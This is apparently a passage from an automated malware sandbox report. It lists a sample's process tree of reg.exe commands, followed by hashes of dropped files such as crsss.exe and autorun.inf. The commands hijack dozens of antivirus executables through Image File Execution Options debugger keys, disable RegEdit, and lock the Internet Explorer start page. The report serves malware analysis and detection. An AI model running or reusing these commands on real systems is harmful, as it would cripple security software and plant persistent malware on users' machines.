                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                      3⤵
                                                                      • Event Triggered Execution: Image File Execution Options Injection
                                                                      PID:3220
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                      3⤵
                                                                      • Event Triggered Execution: Image File Execution Options Injection
                                                                      PID:1676
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                      3⤵
                                                                        PID:2096
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                        3⤵
                                                                          PID:748
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                          3⤵
                                                                            PID:4520
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              4⤵
                                                                                PID:3196
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                              3⤵
                                                                                PID:1792
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  4⤵
                                                                                    PID:4416
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                  3⤵
                                                                                    PID:2132
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                    3⤵
                                                                                      PID:4180
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                      3⤵
                                                                                        PID:768
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                        3⤵
                                                                                          PID:2704
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                          3⤵
                                                                                          • Event Triggered Execution: Image File Execution Options Injection
                                                                                          PID:4620
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                          3⤵
                                                                                            PID:2612
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                            3⤵
                                                                                            • Event Triggered Execution: Image File Execution Options Injection
                                                                                            PID:872
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                            3⤵
                                                                                              PID:2140
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                              3⤵
                                                                                                PID:1456
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                                3⤵
                                                                                                • Event Triggered Execution: Image File Execution Options Injection
                                                                                                PID:2528
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                                3⤵
                                                                                                  PID:2384
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                                  3⤵
                                                                                                    PID:3944
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                                    3⤵
                                                                                                    • Event Triggered Execution: Image File Execution Options Injection
                                                                                                    PID:2104
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                                    3⤵
                                                                                                    • Event Triggered Execution: Image File Execution Options Injection
                                                                                                    PID:8
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      4⤵
                                                                                                        PID:324
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                                      3⤵
                                                                                                      • Event Triggered Execution: Image File Execution Options Injection
                                                                                                      PID:912
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                                      3⤵
                                                                                                        PID:4148
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                                        3⤵
                                                                                                          PID:2868
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            4⤵
                                                                                                              PID:2288
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                                            3⤵
                                                                                                            • Event Triggered Execution: Image File Execution Options Injection
                                                                                                            PID:4016
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                                                            3⤵
                                                                                                            • Event Triggered Execution: Image File Execution Options Injection
                                                                                                            PID:3696
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_dword /d 00000001 /f
                                                                                                            3⤵
                                                                                                            • Disables RegEdit via registry modification
                                                                                                            • Modifies registry key
                                                                                                            PID:4352
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                            3⤵
                                                                                                              PID:3172
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                              3⤵
                                                                                                                PID:3424
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                3⤵
                                                                                                                  PID:876
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                  3⤵
                                                                                                                    PID:1472
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                    3⤵
                                                                                                                      PID:4860
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                      3⤵
                                                                                                                        PID:4124
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                        3⤵
                                                                                                                          PID:408
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                          3⤵
                                                                                                                            PID:2348
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                            3⤵
                                                                                                                              PID:908
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                              3⤵
                                                                                                                                PID:4664
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                3⤵
                                                                                                                                  PID:1160
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                  3⤵
                                                                                                                                    PID:2372
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                    3⤵
                                                                                                                                      PID:452
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                      3⤵
                                                                                                                                        PID:4448
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                        3⤵
                                                                                                                                          PID:4264
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                          3⤵
                                                                                                                                            PID:2916
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                            3⤵
                                                                                                                                              PID:4600
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                              3⤵
                                                                                                                                                PID:2508
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                3⤵
                                                                                                                                                  PID:3508
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2060
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1480
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5088
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2884
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1692
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4696
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4272
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3004
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4244
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1500
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1572
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2248
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4952
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:1124
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3508
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1200
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3876
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5056
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3024
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5048
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2308
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2836
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4784
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4860
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:1020
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:2704
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1628
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2568
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:1328
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:3644
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:908
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d <html><html dir="ltr"> /f
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4536
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:1396
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\33714f9911a0e53e7c88fed03d76bd24_JaffaCakes118.bat
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:4664
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\33714f9911a0e53e7c88fed03d76bd24_JaffaCakes118.bat""
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:2040

                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\33714f9911a0e53e7c88fed03d76bd24_JaffaCakes118.bat

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    108B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    ad09abf56ad2dbbf8653396c5a08037b

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    3307a0659288ddab5ad236e80daab47f01f5ef72

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    d01f4715fe587ff5fa4e0ca071f76b25723d3925f0a473a4641ca1c40d2d72e0

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    37e92693eaefae3cd10ca6d4e9f488e24c7ce5e513d0463bc86c389883a701c7a943e673a52900ebf830fa28a11b6a119013a599629d792a8c52db4906befc68

                                                                                                                                                                                                                  • C:\Windows\SysWOW64\crsss.exe

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    61KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    33714f9911a0e53e7c88fed03d76bd24

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    5914171a6baf02486159c851019d991e2d0ba279

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    eb2231d811d3f155d8f842b0cfc2d40cac2ec1b8028fd921a33982892035e049

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    53f91bb056a84de007cb3ef161eb95b68ac99b13a59474454c6f7f1b99c1be90e5da4b4594c83da7fc6a0045d0fa7927aff7ab76fe75ae94bd1b0db41665c39d

                                                                                                                                                                                                                  • C:\Windows\SysWOW64\test1.txt

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    e62d6095b5a305426b044b3355fde8a4

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    5c921870fd109db5fbe37c947f6748be3332c02c

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    c28037aa61ffb4f6cd9991a59b81519407ca489ebbd0959420521f814c92f7f5

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    e5c94fe5d2b062396b6fdf2e6f2269d7616529cd7d9059582bd33ada3c0493d1f915dfb2435371810b12aed9e513bc3775b3ea68c9a3903d76b2fb108eeea8d3

                                                                                                                                                                                                                  • C:\autorun.inf

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    159B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    1936d4487e994cdcdfd75538ad6b26b1

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    7ea7c2cb2fa0efcd476bc67024782e3d6a11f1f1

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    e1306be2c236374e9c5a732ab39b6f3bc633644a6a6645460aa2f3c6f9782c5d

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    4d6eca70e4f00e9a8483373ed946c6d3e4fc1f258699c8b17b0520fc04aa29ba16df7a4f101402a49fdf7a7399ce1066afdd4866a4754db76829c35169ea4508

                                                                                                                                                                                                                  • memory/4540-7-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

